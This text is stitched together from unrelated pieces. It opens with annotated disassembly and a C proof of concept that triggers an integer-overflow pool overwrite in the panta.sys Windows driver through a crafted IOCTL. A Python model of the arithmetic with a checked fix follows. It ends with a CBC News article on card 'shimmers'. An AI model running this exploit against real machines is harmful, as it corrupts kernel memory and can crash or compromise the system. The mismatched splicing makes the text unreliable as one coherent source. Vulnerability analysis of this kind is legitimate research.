.text:9A26F17B jnb short loc_9A26F19A
.text:9A26F17D mov edx, [ebp+var_4] ; Counter value
.text:9A26F180 imul edx, 38h
.text:9A26F183 mov eax, DeviceObject
.text:9A26F188 mov ecx, [eax+1B0h] ; Pointer to allocated pool copied to ecx
.text:9A26F18E lea edx, [ecx+edx+30h] ; pointer+size(0x38*edx)+0x30
.text:9A26F192 push edx
.text:9A26F193 call sub_9A26C000 ; Starts overwriting other pool allocations !!!
.text:9A26F198 jmp short loc_9A26F160

.text:9A26C000 sub_9A26C000 proc near
.text:9A26C000
.text:9A26C000
.text:9A26C000 arg_0 = dword ptr 8
.text:9A26C000
.text:9A26C000 push ebp
.text:9A26C001 mov ebp, esp
.text:9A26C003 mov eax, [ebp+arg_0] ; Copy allocated buffer pointer (pointer+size(0x38*edx)+0x30) to eax
.text:9A26C006 mov ecx, [ebp+arg_0] ; Copy allocated buffer pointer (pointer+size(0x38*edx)+0x30) to ecx
.text:9A26C009 mov [eax+4], ecx ; Store pointer in allocated buffer at pointer+size(0x38*edx)+0x30+4
.text:9A26C00C mov edx, [ebp+arg_0] ; Copy allocated buffer pointer+size(0x38*edx)+0x30 to edx
.text:9A26C00F mov eax, [ebp+arg_0] ; Copy allocated buffer pointer+size(0x38*edx)+0x30 to eax
.text:9A26C012 mov [edx], eax ; Store pointer in allocated buffer at pointer+size(0x38*edx)+0x30
.text:9A26C014 pop ebp
.text:9A26C015 retn 4
.text:9A26C015 sub_9A26C000 endp

*/

#include <stdio.h>
#include <string.h>
#include <conio.h>
#include <windows.h>

#define BUFSIZE 44

int main(int argc, char *argv[])
{
    HANDLE hDevice;
    char devhandle[MAX_PATH];
    DWORD dwRetBytes = 0;
    unsigned char buffer[BUFSIZE];

    memset(buffer, 0x41, BUFSIZE);

    printf("\n[i] Size of total input buffer %d bytes", BUFSIZE);

    /* Offset 0x14 is the element count the driver multiplies by 0x38
     * (see the disassembly above); 0x04924925 * 0x38 wraps to 0x18 */
    *(DWORD*)(buffer + 20) = 0x04924925;

    sprintf(devhandle, "\\\\.\\%s", "panta");

    hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);

    if(hDevice == INVALID_HANDLE_VALUE)
    {
        printf("\n[-] Failed to open device %s\n\n", devhandle);
        return -1;
    }
    else
    {
        printf("\n[+] Open %s device successful", devhandle);
    }

    printf("\n[~] Press any key to continue . . .");
    getch();

    DeviceIoControl(hDevice, 0x88002200, buffer, BUFSIZE, NULL, 0, &dwRetBytes, NULL);

    printf("\n");
    CloseHandle(hDevice);
    return 0;
}
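The wraparound the annotated disassembly walks through, carried out in Python as an added example (not the researcher's or the vendor's code): the element size 0x38, the 0x30 write offset and the count 0x04924925 are taken from the annotations above, the 32-bit truncation of imul is modelled with an explicit mask, and a checked version of the size computation shows the fix. Kernel pool allocation is replaced by plain arithmetic.

```python
"""32-bit size arithmetic from the panta.sys disassembly, modelled in Python.

Added example, not code from the driver or the advisory. Constants are read
off the annotated disassembly: each element is 0x38 bytes, the loop body
stores two dwords at element_base + 0x30, and the crashing count is 0x04924925.
"""
UINT32_MAX = 0xFFFFFFFF
ELEM_SIZE = 0x38       # imul ecx, 38h
WRITE_OFFSET = 0x30    # lea edx, [ecx+edx+30h]
WRITE_LEN = 8          # sub_9A26C000 stores at [edx] and [edx+4]


def wrapped_alloc_size(count):
    """What the vulnerable code allocates: the product truncated to 32 bits,
    exactly as imul on a 32-bit register leaves it in ecx."""
    return (count * ELEM_SIZE) & UINT32_MAX


def checked_alloc_size(count):
    """Hardened variant: refuse any count whose product does not fit in
    32 bits instead of silently wrapping. Returns None on overflow."""
    if count > UINT32_MAX // ELEM_SIZE:
        return None
    return count * ELEM_SIZE


def smallest_wrapping_count():
    """First element count for which count * ELEM_SIZE exceeds 32 bits.
    For ELEM_SIZE 0x38 this is 0x04924925, the value the PoC above uses."""
    return UINT32_MAX // ELEM_SIZE + 1


def first_out_of_bounds_iteration(count):
    """Index of the first loop iteration whose write leaves the (wrapped)
    allocation, or None if every write stays inside it. The loop bound is
    the untruncated count while the buffer size is the truncated product;
    the two disagree exactly when the multiplication wrapped."""
    size = wrapped_alloc_size(count)
    if count == 0:
        return None
    if size < WRITE_OFFSET + WRITE_LEN:
        return 0  # even iteration 0 writes past the end
    i = (size - WRITE_OFFSET - WRITE_LEN) // ELEM_SIZE + 1
    return i if i < count else None


def describe(count):
    """Human-readable summary of what the driver would do for a given count."""
    full = count * ELEM_SIZE
    size = wrapped_alloc_size(count)
    oob = first_out_of_bounds_iteration(count)
    outcome = "stays in bounds" if oob is None else f"overruns at iteration {oob}"
    return (f"count=0x{count:08x}: 0x{count:x}*0x{ELEM_SIZE:x}=0x{full:x}, "
            f"allocates 0x{size:x} bytes, {outcome}")


if __name__ == "__main__":
    print(describe(2))
    print(describe(0x04924925))
```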

Move over skimmers, ‘shimmers’ are the newest tool for stealing credit card info – British Columbia – CBC News

Hard-to-detect shimmers represent a new and more devious way to steal chip card information

Consumers and retailers be on guard: there’s a new and more devious way for fraudsters to steal your credit and debit card information.

“Shimmers” are the newest form of credit card skimmers, only smaller, more powerful and practically impossible to detect. And they’re popping up all over the place, says RCMP Cpl. Michael McLaughlin, who sounded the alarm after four shimmers were extracted from checkout card readers at a Coquitlam, B.C., retailer.

“Something this sophisticated, this organized and multi-jurisdictional has all the classic hallmarks of organized crime,” said McLaughlin.


The shimmers retrieved from a Coquitlam retailer even had handy arrows to help a fraudster install them correctly. (Coquitlam RCMP)

Unlike skimmers, a shimmer — named for its slim profile — fits inside a card reader and can be installed quickly and unobtrusively by a criminal who slides it into the machine while pretending to make a purchase or withdrawal. 

Once installed, the microchips on the shimmer record information from chip cards, including the PIN.

That information is later extracted when the criminal inserts a special card — also during a purchase or cash withdrawal — which downloads the data. The information is then used to make fake cards.

Fraud clue: sticky card

Shimmers have rendered the bigger and bulkier skimmers virtually obsolete, according to Const. Alex Bojic of the Coquitlam RCMP economic crime unit.

“You can’t see a shimmer from the outside like the old skimmer version,” Bojic said in a statement.

“Businesses and consumers should immediately report anything abnormal about the way their card is acting … especially if the card is sticking inside the machine.”

McLaughlin said the Coquitlam retailer detected the shimmers through its newly introduced daily testing of point-of-sales terminals. A test card inserted into the machines kept on getting stuck and the shimmers were found when the terminals were opened. 

“We want to get the word out,” said McLaughlin. “Businesses really need to be checking for these kinds of devices and consumers need to be aware of them.”

Bojic said using the tap function of a chip card is one way to avoid being “shimmed.” 

“It’s actually very secure. Each tap transfers very limited banking information, which can’t be used to clone your card,” Bojic said.